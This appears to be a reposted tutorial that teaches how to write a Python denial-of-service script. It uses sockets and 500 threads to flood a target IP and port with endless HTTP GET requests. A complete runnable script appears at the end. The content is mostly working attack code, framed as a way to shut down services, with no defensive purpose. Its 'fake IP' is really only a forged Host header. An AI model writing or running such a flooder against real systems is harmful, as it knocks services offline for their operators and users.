DDOS stands for Distributed Denial of Service and it is an attack where we block the resources of a server by flooding it with requests with the help of so-called botnets.
The implementation only need to send requests to a host on a specific port over and over again. This can be done with sockets. To speed the process up and make it more effective, we will use multi-threading as well. So, the following libraries will be needed for this tutorial:
import socket import threading
Now the first thing we need are the target’s IP-address, the port we want to attack and our fake IP-address that we want to use. Note that the fake ip doesn’t make you anonymous.
target = '10.0.0.138' fake_ip = '182.21.20.32' port = 80
Example to attack the port 80, which is HTTP. If you want to shut down a specific service, you need to know which port it is operating at. The next thing we need to do is to implement the actual attacking function.
def attack(): while True: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target, port)) s.sendto(("GET /" + target + " HTTP/1.1\r\n").encode('ascii'), (target, port)) s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (target, port)) s.close()
This attack function will be running in each of our individual threads. It starts an endless loop, within which it creates a socket, connects to the target and sends an HTTP request over and over again.
We are injecting our fake IP-address into the request encoded into bytes to the server. At the end of every iteration, we close our socket.
We need to do is to run multiple threads that execute this function at the same time. If we would just run the function, it would send a lot of requests over and over again but it would always be only one after the other. By using multi-threading, we can send many requests at once.
for i in range(500): thread = threading.Thread(target=attack) thread.start()
In this case, we are starting 500 threads that will execute our function, we can play around maybe 30 or 50 are already sufficient. If you want to see some information, you may print the amounts of requests already sent. Just notice that this will slow down your attack.
attack_num = 0 def attack(): while True: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target, port)) s.sendto(("GET /" + target + " HTTP/1.1\r\n").encode('ascii'), (target, port)) s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (target, port)) global attack_num attack_num += 1 print(attack_num) s.close()
We created a variable attack_num that tracks how many requests have been sent already. With every iteration, we increase this number and print it.
Full script below:
#https://www.neuralnine.com/code-a-ddos-script-in-python/ import socket import threading target = '10.0.0.138' fake_ip = '182.21.20.32' port = 80 attack_num = 0 def attack(): while True: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target, port)) s.sendto(("GET /" + target + " HTTP/1.1\r\n").encode('ascii'), (target, port)) s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (target, port)) global attack_num attack_num += 1 print(attack_num) s.close() for i in range(500): thread = threading.Thread(target=attack) thread.start()
This article taken from https://www.neuralnine.com/code-a-ddos-script-in-python/